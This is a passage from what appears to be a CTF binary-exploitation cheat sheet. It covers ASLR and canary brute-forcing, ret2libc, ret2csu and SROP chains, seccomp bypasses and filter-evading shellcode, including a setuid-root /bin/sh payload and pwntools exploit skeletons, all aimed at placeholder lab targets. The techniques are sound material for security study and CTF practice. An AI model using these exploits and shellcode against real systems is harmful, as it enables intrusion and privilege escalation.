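def module_base(leaked_addr: int, symbol_offset: int) -> int:
    """Base address of the module that contains the leaked symbol."""
    base = leaked_addr - symbol_offset
    if base % PAGE:
        raise ValueError("base is not page-aligned; wrong symbol or wrong library version?")
    return base

leaked_puts = 0x7FFFF7E50E50                 # hypothetical leak
puts_off, system_off = 0x80E50, 0x50D70      # hypothetical symbol offsets

base = module_base(leaked_puts, puts_off)
print(hex(base))                             # 0x7ffff7dd0000
print(hex(base + system_off))                # 0x7ffff7e20d70
```

A failed alignment check is a cheap early signal that the local libc does not match the remote one.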

Method 2: Partial Overwrite (YOLO)

Memory is managed in pages (typically 0x1000 bytes). The lowest 12 bits of an address represent the page offset and are not randomized by ASLR.

Strategy: Overwrite only the least significant 1 or 2 bytes of the return address. This allows redirecting execution to a different instruction within the same page (or nearby) without knowing the randomized base. Overwriting 2 bytes usually requires a 1/16 brute-force of the 4th nibble.
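The 1/16 figure follows from the bit layout: the low 12 bits of the target are known, and only the next nibble depends on the randomized base. A sketch that enumerates the candidates for a hypothetical target offset 0x1d08 (low16_candidates is an illustrative name):

```python
def low16_candidates(target_rva: int) -> list:
    """All 16 possible low-16-bit values for a target whose low 12 bits are known."""
    page_off = target_rva & 0xFFF
    return [(nibble << 12) | page_off for nibble in range(16)]

cands = low16_candidates(0x1D08)
print(len(cands))                      # 16
print([hex(c) for c in cands[:3]])     # ['0xd08', '0x1d08', '0x2d08']
```

In practice one candidate is picked and the exploit is rerun until the randomized nibble happens to match.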

Method 3: Fork Brute-force

In a fork()-based network server, child processes inherit the exact memory layout of the parent, including ASLR offsets and the canary.

Strategy: Brute-force the canary or return address byte-by-byte. If the child crashes, the parent simply forks a new one with the same values, allowing for infinite attempts.

Canary brute-force skeleton:

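from pwn import *

canary = b"\x00"                      # glibc keeps the low canary byte NUL
for i in range(7):
    for guess in range(256):
        io = remote("host", 1337)
        payload = b"A" * offset_to_canary + canary + bytes([guess])
        io.send(payload)
        out = io.recvall(timeout=0.2)
        io.close()
        # Success oracle is target-specific: adjust the markers to what the service prints
        if b"stack smashing detected" not in out and b"crash" not in out:
            canary += bytes([guess])
            break
    else:
        raise RuntimeError(f"no valid guess for canary byte {i + 1}")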
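The cost of this attack is easy to check offline. The sketch below replaces the network round trip with a local oracle (a stand-in, not a real service) that reports whether a guessed prefix matches, and counts attempts; the worst case is 7 * 256 = 1792 connections instead of 2^56.

```python
import os

def make_oracle(secret: bytes):
    """Stand-in for one connection to a forking server: True if the child survived."""
    def oracle(guess_prefix: bytes) -> bool:
        return secret.startswith(guess_prefix)
    return oracle

def brute_canary(oracle, length: int = 8) -> tuple:
    """Recover the canary one byte at a time; returns (canary, attempts)."""
    known = b"\x00"                       # low byte assumed NUL
    attempts = 0
    while len(known) < length:
        for guess in range(256):
            attempts += 1
            if oracle(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte survived; the oracle is unreliable")
    return known, attempts

secret = b"\x00" + os.urandom(7)          # simulated canary
found, attempts = brute_canary(make_oracle(secret))
print(found == secret, attempts)
```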

Method 4: ret2libc

With NX enabled, call existing libc code instead of injecting code.

Leak a libc pointer, e.g. puts(puts@GOT).
Compute libc.address = leaked_puts - libc.sym["puts"].
Call system("/bin/sh") or execve gadgets.

from pwn import *

context.binary = elf = ELF("./chall")   # sets arch so flat() packs 8-byte words
libc = ELF("./libc.so.6")
rop = ROP(elf)
pop_rdi = rop.find_gadget(["pop rdi", "ret"])[0]
ret = rop.find_gadget(["ret"])[0]

# Stage 1: puts(puts@GOT) leaks a libc address, then main runs again
payload = flat(
    b"A" * offset,
    pop_rdi,
    elf.got["puts"],
    elf.plt["puts"],
    elf.sym["main"],
)

# receive leak, then second stage
libc.address = leak - libc.sym["puts"]
binsh = next(libc.search(b"/bin/sh\x00"))
payload = flat(
    b"A" * offset,
    ret,                         # optional stack alignment
    pop_rdi,
    binsh,
    libc.sym["system"],
)

Method 5: ret2plt / ret2csu

ret2plt: call imported functions through PLT when the binary has useful PLT entries and controlled arguments.
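ret2csu: use gadgets inside __libc_csu_init to populate RDI, RSI, RDX when simple pop rdi; ret / pop rsi; ret gadgets are missing. Binaries linked against glibc 2.34 or newer no longer contain __libc_csu_init, so check that the function exists first.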

Typical ret2csu idea:

gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
gadget 2: mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]

Set rbx = 0, rbp = 1, r12 = function_pointer_table, r13 = arg1, r14 = arg2, r15 = arg3.
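A chain for this layout can be sketched with struct alone. It assumes the common code shape where gadget 2 falls through into add rsp, 8 and the six pops of gadget 1 after the call returns, so seven filler qwords are needed before the next return address. All addresses are hypothetical and must be taken from the actual binary; q and ret2csu are illustrative helpers.

```python
import struct

def q(*values: int) -> bytes:
    """Pack integers as little-endian 64-bit words."""
    return b"".join(struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF) for v in values)

def ret2csu(gadget1, gadget2, func_ptr_slot, arg1, arg2, arg3, next_ret) -> bytes:
    chain = q(
        gadget1,
        0,              # rbx = 0, so the call target is [r12 + 0*8]
        1,              # rbp = 1, so rbx + 1 == rbp and the loop exits
        func_ptr_slot,  # r12: address of a slot holding the function pointer (e.g. a GOT entry)
        arg1,           # r13 -> edi (low 32 bits only)
        arg2,           # r14 -> rsi
        arg3,           # r15 -> rdx
        gadget2,
    )
    chain += q(*[0] * 7)   # add rsp, 8 plus six pops after the call returns
    chain += q(next_ret)   # where the final ret lands
    return chain

# Hypothetical addresses for illustration only.
chain = ret2csu(0x4012BA, 0x4012A0, 0x404018, 1, 0x404060, 0x100, 0x401196)
print(len(chain))          # 128
```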

Method 6: SROP

Sigreturn-oriented programming uses a fake rt_sigreturn frame to set all registers. Useful when gadgets are scarce but you can execute syscall with RAX = 15 (rt_sigreturn).

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret
payload = flat(b"A" * offset, pop_rax, 15, syscall_ret, bytes(frame))

Seccomp Notes

If shellcode or ROP mysteriously dies on execve, check seccomp filters.

seccomp-tools dump ./chall
strace ./chall

Common bypasses:

If execve is blocked but file syscalls are allowed: open/read/write or sendfile the flag.
If open is blocked but openat allowed: use openat(AT_FDCWD, "/flag", 0).
If only read, write, exit, sigreturn are allowed: consider SROP or staged ROP.

Shellcoding

Toolchain

# Compile shellcode (static, no libc)
gcc -nostdlib -static shellcode.s -o shellcode-elf

# Extract raw shellcode bytes
objcopy --dump-section .text=shellcode-raw shellcode-elf

# Compile with RWX .text (for SMC)
gcc -Wl,-N --static -nostdlib -o test test.s

Forbidden Bytes

Avoid bytes that terminate or split input strings:

Byte	Name	Trigger
`0x00`	`null byte`	`strcpy`, `printf` (Terminator)
`0x0a`	`newline`	`fgets`, `scanf` (End of Input)
`0x20`	`space`	`scanf` (Separator)

Null Byte Avoidance Techniques

Bad	Good	Reason
`mov RAX, 0`	`xor EAX, EAX`	Avoids long `null byte` sequence
`mov RAX, 5`	`xor EAX, EAX; mov AL, 5`	Avoids `0x00` padding in 64-bit `mov`
`mov RAX, 10`	`push 9; pop RAX; inc RAX`	Avoids `0x0a` (`newline`)

Other size/filter tricks:

Use 32-bit register writes (eax, edi, esi) to avoid REX.W (0x48) and zero-extend into 64-bit registers.
Use push imm; pop reg for small constants.
Use cdq to fill EDX with the sign bit of EAX; this zeroes RDX when EAX is non-negative (bit 31 clear).
Store strings on the stack in little-endian order.
XOR-encode constants to avoid bad bytes, then decode in-place.
If shellcode is called through a register, inspect live registers before execution; they may point to the shellcode mapping and save bytes with lea.
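Two of these tricks can be checked mechanically: scanning assembled bytes for forbidden values, and confirming that an XOR-encoded constant is clean. The instruction encodings below are the usual ones emitted by common assemblers; the bad-byte set and helper name are assumptions to adapt per target.

```python
BAD = b"\x00\x0a\x20"    # NUL, newline, space (adjust to the input function)

def bad_offsets(code: bytes, bad: bytes = BAD) -> list:
    """Return (offset, byte) pairs for every forbidden byte in `code`."""
    return [(i, hex(b)) for i, b in enumerate(code) if b in bad]

mov_rax_0 = bytes.fromhex("48c7c000000000")   # mov rax, 0
xor_eax = bytes.fromhex("31c0")               # xor eax, eax
print(bad_offsets(mov_rax_0))   # [(3, '0x0'), (4, '0x0'), (5, '0x0'), (6, '0x0')]
print(bad_offsets(xor_eax))     # []

# XOR-encode "/flag" with a key of 0x01 bytes; decoding in place restores it.
KEY = 0x0101010101010101
value = int.from_bytes(b"/flag", "little")    # 0x67616c662f
encoded = KEY ^ value
print(bad_offsets(encoded.to_bytes(8, "little")))   # []
print((encoded ^ KEY).to_bytes(8, "little"))        # b'/flag\x00\x00\x00'
```

Running the scanner over the final payload before sending it catches bad bytes that creep in through addresses or immediates.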

NOP Sled & Stack Shellcode

NOP sled (\x90) tolerates approximate jump targets. It is useful when stack addresses shift due to environment differences.

nop_sled = b"\x90" * 512
shellcode = asm(shellcraft.cat("/flag"))
payload = nop_sled + shellcode
payload = payload.ljust(offset, b"A") + p64(approx_stack_addr)

Avoid stack self-destruction: after ret, RSP points just above the return address. Shellcode using push may overwrite nearby bytes below RSP. Place shellcode sufficiently before/after the overwritten return path or use a large sled.

Staged Shellcode

When input length is too small, first-stage shellcode reads a larger second stage into RWX memory or stack, then jumps there.

; read(0, rsp, 0x400); jmp rsp
xor eax, eax
xor edi, edi
mov rsi, rsp
mov dx, 0x400       ; writes only DX; assumes the upper bits of RDX are already 0
syscall
jmp rsp

Self-Modifying Code (SMC)

Runtime modification of the .text segment to bypass static filters. Requires the segment to be writable (-Wl,-N).

; Bypassing 'syscall' (0x0f05) filter
inc BYTE PTR [RIP+1]
.byte 0x0f
.byte 0x04            ; Runtime: 0x04 -> 0x05 (creating 0x0f05)

If the first page is made RX after input, place the patching code and patch targets on a later still-writable page, or use a first-stage jump over the protected region.
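The idea can be verified offline by modelling the filter and the runtime patch. The filter below is a guess at what a challenge might implement (a plain substring search for 0f 05), and the inc instruction is written with its usual encoding fe 05 followed by a 32-bit displacement.

```python
SYSCALL = b"\x0f\x05"

def passes_filter(code: bytes) -> bool:
    """Hypothetical static filter: reject input containing the syscall opcode."""
    return SYSCALL not in code

# inc byte ptr [rip+1] ; .byte 0x0f ; .byte 0x04
stub = bytearray.fromhex("fe0501000000" "0f04")
print(passes_filter(bytes(stub)))     # True: no 0f 05 in the submitted bytes

# RIP-relative addressing is relative to the next instruction (offset 6 here),
# so [rip+1] is the byte at offset 7. Apply the increment the CPU would perform.
next_insn = 6
stub[next_insn + 1] = (stub[next_insn + 1] + 1) & 0xFF
print(stub[next_insn:].hex())         # 0f05
```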

CET: SHSTK & IBT

Intel CET adds hardware CFI:

SHSTK (Shadow Stack): return addresses are mirrored on a protected shadow stack. ret compares the normal stack return address against the shadow one. A classic saved-RIP overwrite can crash even when canary is disabled.
IBT (Indirect Branch Tracking): indirect call/jmp targets must start with endbr64 (f3 0f 1e fa).
notrack prefix: notrack jmp rax can bypass IBT checks for that branch, so a corrupted function pointer/register may jump to shellcode or arbitrary code even when IBT is enabled.

When SHSTK blocks ROP, look for:

Non-return indirect branches: jmp rax, call rax, switch-table dispatch.
notrack jumps in compiler-generated switch code.
Writable function pointers, vtables, callback tables, jump-table indexes.
Logic bugs that reach win without hijacking ret.
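When choosing a target for a corrupted function pointer under IBT, a quick byte check tells whether the address is a valid landing pad. A minimal sketch over raw code bytes; the function bytes are a made-up example and valid_ibt_target is an illustrative name.

```python
ENDBR64 = bytes.fromhex("f30f1efa")

def valid_ibt_target(code: bytes, offset: int) -> bool:
    """True if the instruction at `offset` is endbr64."""
    return code[offset:offset + 4] == ENDBR64

# endbr64; push rbp; mov rbp, rsp
func = ENDBR64 + bytes.fromhex("554889e5")
print(valid_ibt_target(func, 0))   # True: function entry
print(valid_ibt_target(func, 4))   # False: mid-function target
```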

Reference Shellcodes

x64 root shell (No REX.W/0x48)

# Avoids \x48 (REX.W prefix)
.global _start
_start:
.intel_syntax noprefix

    /* 0. Set UID to root (setuid(0)) */
    xor edi, edi        /* rdi = 0 (root UID) -> 31 ff */
    push 105            /* syscall 105 (0x69) = setuid */
    pop rax             /* 6a 69 58 */
    syscall

    /* 1. Prepare null bytes and allocate stack space */
    xor esi, esi
    push rsi            /* 8-byte null terminator */
    push rsi            /* space for /bin//sh */
    push rsp
    pop rdi             /* push rsp (0x54) + pop rdi (0x5f) avoids mov rdi, rsp (0x48) */

    /* 2. Construct /bin//sh on the stack (using 32-bit ops to avoid REX.W) */
    /* 0x6e69622f = "nib/", 0x68732f2f = "hs//" (little-endian) */
    mov dword ptr [rdi], 0x6e69622f
    mov dword ptr [rdi+4], 0x68732f2f

    /* 3. Set execve syscall number */
    push 59
    pop rax             /* avoids mov rax, 59 */

    /* 4. Clear edx (envp) and execute */
    xor edx, edx
    syscall

x64 execve("/bin/sh") (22-23 bytes)

; Standard 22-23 byte execve("/bin/sh")

; BITS 64

xor rsi, rsi        ; Clear RSI (argv = NULL)
push rsi            ; Push NULL terminator for string
mov rbx, 0x68732f2f6e69622f ; "/bin//sh" in little-endian
push rbx            ; Push string to stack
push rsp            ; Push address of string
pop rdi             ; RDI = address of "/bin//sh" (filename)
mov al, 0x3b        ; AL = 59 (execve); assumes the upper bytes of RAX are already 0
cdq                 ; RDX = 0 (envp = NULL) because bit 31 of EAX is clear
syscall             ; Execute

x64 cat /flag

.section .shellcode,"awx"
.global _start
_start:
.intel_syntax noprefix
    /* push b'/flag\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    /* call open('rsp', 'O_RDONLY', 'rdx') */
    push 2
    pop rax
    mov rdi, rsp
    xor esi, esi /* O_RDONLY */
    syscall
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40 /* 0x28 */
    pop rax
    push 1
    pop rdi
    cdq /* rdx=0 */
    syscall

x64 cat /flag (No REX.W/0x48)

.global _start
_start:
.intel_syntax noprefix

    /* 1. OPEN: open("/flag", O_RDONLY) -> Syscall 2 */
    xor esi, esi                    /* rsi = 0 (O_RDONLY) -> 31 f6 */
    push rsi                        /* null terminator */
    push rsp
    pop rdi                         /* rdi points to stack top (avoids mov rdi, rsp) */

    /* Construct "/flag" using 32-bit and 8-bit writes */
    /* "/fla" = 0x616c662f */
    mov dword ptr [rdi], 0x616c662f /* c7 07 2f 66 6c 61 */
    /* "g" = 0x67 */
    mov byte ptr [rdi+4], 0x67      /* c6 47 04 67 */

    push 2
    pop rax                         /* open syscall number */
    syscall                         /* fd returned in rax */

    /* 2. READ: read(fd, buffer, size) -> Syscall 0 */
    xchg eax, edi                   /* edi = fd; eax receives the old edi and is zeroed below (0x97) */

    push rsp
    pop rsi                         /* rsi = rsp (buffer) */

    mov dl, 100                     /* dl = 100 (size); upper bits of rdx keep their previous value */
    xor eax, eax                    /* read syscall number */
    syscall

    /* 3. WRITE: write(stdout, buffer, size) -> Syscall 1 */
    xchg eax, edx                   /* rdx = bytes read (0x92) */

    push 1
    pop rdi                         /* rdi = 1 (stdout) */

    push 1
    pop rax                         /* write syscall number */
    syscall

x64 cat /flag (No 'syscall' opcode)

.section .shellcode,"awx"
.global _start
_start:
.intel_syntax noprefix
    /* push b'/flag\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    /* call open('rsp', 'O_RDONLY', 'rdx') */
    push 2
    pop rax
    mov rdi, rsp
    xor esi, esi
    inc byte ptr [rip + patch_target1 + 1]
patch_target1:
    .byte 0x0f
    .byte 0x04            /* Patched to 0x0f05 at runtime */
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40
    pop rax
    push 1
    pop rdi
    cdq
    inc byte ptr [rip + patch_target2 + 1]
patch_target2:
    .byte 0x0f
    .byte 0x04
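
Two tricks in the listing above can be checked offline: the XOR-masked push that keeps zero bytes out of the immediates, and the one-byte increment that turns the stored `0f 04` into `0f 05`. This is a minimal sketch using only the standard library; the variable names are illustrative.

```python
MASK = 0x0101010101010101                    # first value pushed by the shellcode
path = int.from_bytes(b"/flag", "little")    # the qword that must end up on the stack

second = MASK ^ path                         # immediate loaded before `xor [rsp], rax`
decoded = (MASK ^ second).to_bytes(8, "little")

# Neither immediate contains a zero byte, unlike the raw path qword.
assert 0 not in MASK.to_bytes(8, "little")
assert 0 not in second.to_bytes(8, "little")

# The stub is stored as 0f 04; `inc byte ptr [... + 1]` bumps the second byte.
stub = bytearray(b"\x0f\x04")
stub[1] = (stub[1] + 1) & 0xFF

print(decoded, stub.hex())
```

Because the patch writes into the code itself, the shellcode only works when it runs from memory that is both writable and executable, which is what the "awx" section flags request.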

Common Terms

Term	Description
ROP	Return-Oriented Programming. Chaining "gadgets" ending in `ret`.
JOP/COP	Jump/Call-Oriented Programming. Chains indirect `jmp`/`call` dispatch instead of `ret`.
ret2win	Overwrite control flow to a hidden/success function in the binary.
ret2libc	Redirecting execution to a `libc` function instead of shellcode.
ret2plt	Calling a PLT stub in the binary, often to leak or invoke imported functions.
ret2csu	Using `__libc_csu_init` gadgets to set up multi-register function calls (the function is absent from binaries built against glibc 2.34 or later).
SROP	Sigreturn-Oriented Programming. Fake a signal frame to control registers.
PLT/GOT	Procedure Linkage Table & Global Offset Table. Used for resolving external library function addresses.
OOB	Out-of-bounds. Accessing memory outside the intended range of an array or buffer.
UAF	Use-after-free. Reusing a pointer after its backing allocation has been freed.
SMC	Self-modifying code. Code patches its own bytes at runtime.
CET	Intel Control-flow Enforcement Technology: mainly `SHSTK` and `IBT`.
endbr64	Valid landing instruction required by IBT for indirect branch targets.

Exploit Skeletons

Local/Remote Toggle

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF("./chall", checksec=False)
context.terminal = ["tmux", "splitw", "-h"]

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([elf.path] + argv, gdbscript="""
        set disassembly-flavor intel
        break *main
        continue
        """, *a, **kw)
    if args.REMOTE:
        return remote("host", 1337)
    return process([elf.path] + argv, *a, **kw)

io = start(env={})

Run with:

python solve.py
python solve.py GDB
python solve.py REMOTE

Leak Parsing

io.recvuntil(b"leak: ")
leak = int(io.recvline().strip(), 16)

raw = io.recvn(6)
addr = u64(raw.ljust(8, b"\x00"))
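
The two leak shapes above (a hex string and raw little-endian bytes) can be parsed without a live target. This is a minimal sketch using only the standard library; the helper names and the sample address are made up for illustration.

```python
def parse_hex_leak(line: bytes) -> int:
    """Parse a text leak such as b'0x7ffff7e1a2b0\\n'."""
    return int(line.strip(), 16)

def parse_raw_leak(raw: bytes) -> int:
    """Zero-extend a raw little-endian pointer (often 6 bytes) to 64 bits."""
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")

text_leak = parse_hex_leak(b"0x7ffff7e1a2b0\n")
raw_leak = parse_raw_leak(bytes.fromhex("b0a2e1f7ff7f"))

print(hex(text_leak), hex(raw_leak))
```

Six bytes are usually enough for a userland pointer on x86_64 because the top two bytes of such addresses are zero, and output functions like puts stop at the first NUL.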

Flat Payloads

payload = flat(
    b"A" * offset,
    canary,
    b"B" * 8,
    pop_rdi,
    next(libc.search(b"/bin/sh\x00")),
    libc.sym["system"],
)
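
To see what ends up on the wire, here is a rough standard-library approximation of the packing that `flat` performs for a 64-bit little-endian target. `flat64` is a hypothetical stand-in, not the pwntools implementation, and every address and the canary below are placeholder values.

```python
import struct

def flat64(*items) -> bytes:
    """Concatenate items, packing ints as little-endian 64-bit words."""
    out = b""
    for item in items:
        out += struct.pack("<Q", item) if isinstance(item, int) else item
    return out

# All values below are made-up placeholders, not real addresses.
offset = 24
canary = 0x1122334455667700
pop_rdi, binsh, system = 0x401234, 0x7FFFF7F5A678, 0x7FFFF7E50D70

payload = flat64(b"A" * offset, canary, b"B" * 8, pop_rdi, binsh, system)
print(len(payload), payload[offset:offset + 8].hex())
```

The layout is padding up to the canary, the canary itself, 8 bytes covering the saved RBP, and then the chain starting at the saved return address.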

Python: Integer to Byte Conversion

In Python, converting an integer (0-255) to a byte string requires careful handling of the bytes() constructor:

Incorrect: bytes(guess)
- If guess = 5, this creates a null-filled byte string of length 5: b'\x00\x00\x00\x00\x00'.
Correct: bytes([guess])
- Passing a list (iterable) treats the integer as the actual byte value.
- If guess = 65, bytes([65]) results in b'A' (0x41).
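
A short check of the difference, with `int.to_bytes` shown as an equivalent alternative for single bytes:

```python
guess = 65

zero_filled = bytes(5)                       # five NUL bytes, not the byte 0x05
single = bytes([guess])                      # one byte with value 65
also_single = guess.to_bytes(1, "little")    # equivalent for values 0-255

print(zero_filled, single, also_single)
```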

movaps

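movaps (Move Aligned Packed Single-Precision Floating-Point Values) is an x86/x64 SIMD (single instruction, multiple data) instruction used mainly for fast data movement.

SIMD vectorization and throughput: Modern CPUs use the XMM registers for vectorized operations. A single movaps moves 128 bits (16 bytes), which makes good use of memory bandwidth. The instruction is common in audio/video codecs, graphics rendering, cryptographic routines, and other compute-intensive matrix workloads.
Memory alignment and cache lines: movaps requires its memory operand to be 16-byte aligned, meaning the address must be a multiple of 16. L1 data cache lines on modern CPUs are typically 64 bytes, so a 16-byte-aligned block can never straddle two cache lines. The CPU can then fetch the data with a single access and avoids the penalty of a load that crosses a cache-line boundary.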

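Stack Alignment in x64 ROP Chains

In 64-bit Linux pwn, calling libc functions such as system() or printf() from a ROP chain often crashes the program. The root cause is a violation of the stack alignment required by the calling convention.

System V AMD64 ABI stack alignment: Immediately before a call instruction transfers control to the target function, rsp % 16 == 0. call pushes an 8-byte return address, so at the callee's first instruction rsp % 16 == 8. The standard prologue's push rbp then restores rsp % 16 == 0.
Why #GP is raised: When an attacker hijacks control flow through a buffer overflow and jumps straight to system("/bin/sh") via a ROP chain, the state of rsp is often left unmaintained. If rsp is off by 8 bytes at that point, execution eventually reaches glibc internals (such as do_system or vfprintf) whose optimized code uses movaps on stack-resident data. movaps on an unaligned stack address raises a hardware General Protection Fault (#GP), which the kernel delivers to the process as SIGSEGV, crashing it.
Exploit fix, ret gadget as stack padding: Insert a bare ret gadget (opcode 0xC3) in the ROP chain before the address of the target function (e.g., system). ret behaves like pop rip: it pops 8 bytes off the stack. That 8-byte shift of rsp is exactly the compensation needed to bring the misaligned rsp back to 16-byte alignment and avoid the movaps fault.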

Quick fix:

rop = ROP(elf)
ret = rop.find_gadget(["ret"])[0]
payload = flat(b"A" * offset, ret, pop_rdi, binsh, system)
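
The effect of the extra ret can be checked with simple arithmetic. The sketch below assumes the overwritten return address belongs to a normally called function, so its stack slot sits at an address with % 16 == 8. The helper names and the stack address are hypothetical.

```python
def rsp_at_entry(ret_slot_addr: int, slots_before_target: int) -> int:
    """rsp when the target function's first instruction runs.

    ret_slot_addr: address of the overwritten saved return address.
    slots_before_target: 8-byte chain slots consumed before the target's
    own address (a `pop rdi; ret` gadget plus its operand counts as 2).
    """
    return ret_slot_addr + 8 * (slots_before_target + 1)

def is_abi_aligned(rsp: int) -> bool:
    # SysV AMD64: rsp % 16 == 8 on entry, right after `call` pushed 8 bytes.
    return rsp % 16 == 8

saved_ret = 0x7FFFFFFFE018      # hypothetical address with % 16 == 8

plain = rsp_at_entry(saved_ret, 2)     # pop_rdi, binsh, system
padded = rsp_at_entry(saved_ret, 3)    # ret, pop_rdi, binsh, system
print(is_abi_aligned(plain), is_abi_aligned(padded))
```

Any odd number of extra 8-byte slots before the target has the same effect, so the ret can sit anywhere earlier in the chain.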

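32-bit (x86) Alignment

In 32-bit exploitation, crashes caused by movaps are far less common, for architectural and compiler reasons:

Calling convention differences: 32-bit conventions such as cdecl pass arguments mainly on the stack, and every pushed argument moves esp by 4 bytes. These frequent 4-byte shifts make 16-byte alignment hard to maintain across a whole call chain.
Compiler instruction selection: Because keeping the stack aligned is costly on 32-bit, compilers (older GCC versions in particular) usually fall back to the more tolerant movups (Move Unaligned, which permits unaligned access), or skip SSE vector instructions altogether and use scalar instructions for ordinary C code.
32-bit stack adjustment: If a 16-byte alignment crash does need fixing on 32-bit, a single ret is not a universal fix as it is on 64-bit, because it shifts esp by only 4 bytes. Compute how far esp is from the aligned state (a multiple of 4), then fine-tune with the corresponding number of ret or pop <reg>; ret gadgets (for example pop eax; ret, which shifts esp by 8) until esp % 16 == 0 holds.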
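
The padding count can be computed directly. This is a minimal sketch, assuming esp is already 4-byte aligned; `pad_slots` and the sample stack addresses are hypothetical.

```python
def pad_slots(esp: int, want_mod16: int = 0, slot: int = 4) -> int:
    """Number of 4-byte filler slots that move esp to the wanted residue."""
    if esp % slot or want_mod16 % slot:
        raise ValueError("esp and target residue must be 4-byte aligned")
    return ((want_mod16 - esp) % 16) // slot

for esp in (0xFFFFD000, 0xFFFFD004, 0xFFFFD008, 0xFFFFD00C):
    print(hex(esp), pad_slots(esp))
```

A bare ret gadget consumes one slot and a pop <reg>; ret gadget consumes two, so any count from 0 to 3 can be built from those two pieces.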